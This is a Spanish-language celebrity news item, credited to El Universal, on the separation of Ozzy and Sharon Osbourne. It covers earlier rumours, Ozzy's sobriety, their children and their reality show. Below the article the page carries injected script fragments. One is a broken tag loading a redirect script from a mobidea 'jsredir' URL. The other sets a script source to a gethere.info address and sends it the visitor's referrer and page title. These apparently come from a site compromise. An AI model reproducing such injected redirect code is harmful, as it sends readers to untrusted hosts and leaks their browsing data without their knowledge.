Los metaleros también lloran, Ozzy y Sharon se separan

Ozzy y Sharon Osbourne se casaron el 4 de julio de 1982 y tras 33 años de matrimonio han decidido separarse, así lo informó E!  Entertainment.

Al parecer, el rompimiento implica que el vocalista de Black Sabbath deje la casa que compartía con la también conductora de televisión, situación que Rolling  Stone confirmó  a través de un vocero de la pareja.

Según la fuente citada por el portal de noticias, la separación no tiene  que ver con los problemas de alcohol o drogas del músico, quien, supuestamente, tiene ya más de cuatro años  sobrio y libre de las adicciones.

En 2013 se generaron informaciones  de una separación del matrimonio, sin embargo, no sucedió.

“Todo lo que ha sido impreso en los tabloides ha sido distorsionado”, aseguró entonces Sharon a los fans en The Talk, programa que actualmente conduce. “Siempre hay una pequeña semilla de verdad en todo lo que es reportado, pero luego todo lo distorsionan”. En aquel momento, el músico publicó en su cuenta oficial de Facebook que había estado bajo los influjos del alcohol.

“Yo estuve un lugar muy oscuro y fui uno tonto con las personas que más amo, mi familia. Pero estoy feliz de estar sobrio ahora”, escribió Ozzy en la red social. Sharon por su parte indicó que esa era la única verdad de lo que se dijo respecto a su separación.

A  finales de abril, Sharon Osbourne agradeció en sus redes sociales  a la ciudad de Melbourne por el amor a su esposo, y es que la banda está en gira de reencuentro  (la cual llegará en octubre a la Ciudad de México).

La pareja tiene tres hijos: Aimee Osbourne, de 32 años, Kelly Osbourne, de 31 años, y Jack Osbourne, de 30, siendo los últimos dos los más reconocidos. Actualmente, Kelly es una de las jueces en Australia’s Got Talent.

La fortuna de ambas celebridades asciende a 440 millones de dólares.

Por  tres  años la familia participó en el reality Los Osbourne en donde ponían al aire su intimidad como personas  poco convencionales y cuyo amor por la música siempre se mantuvo  presente.

 

Fuente: El Universal

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||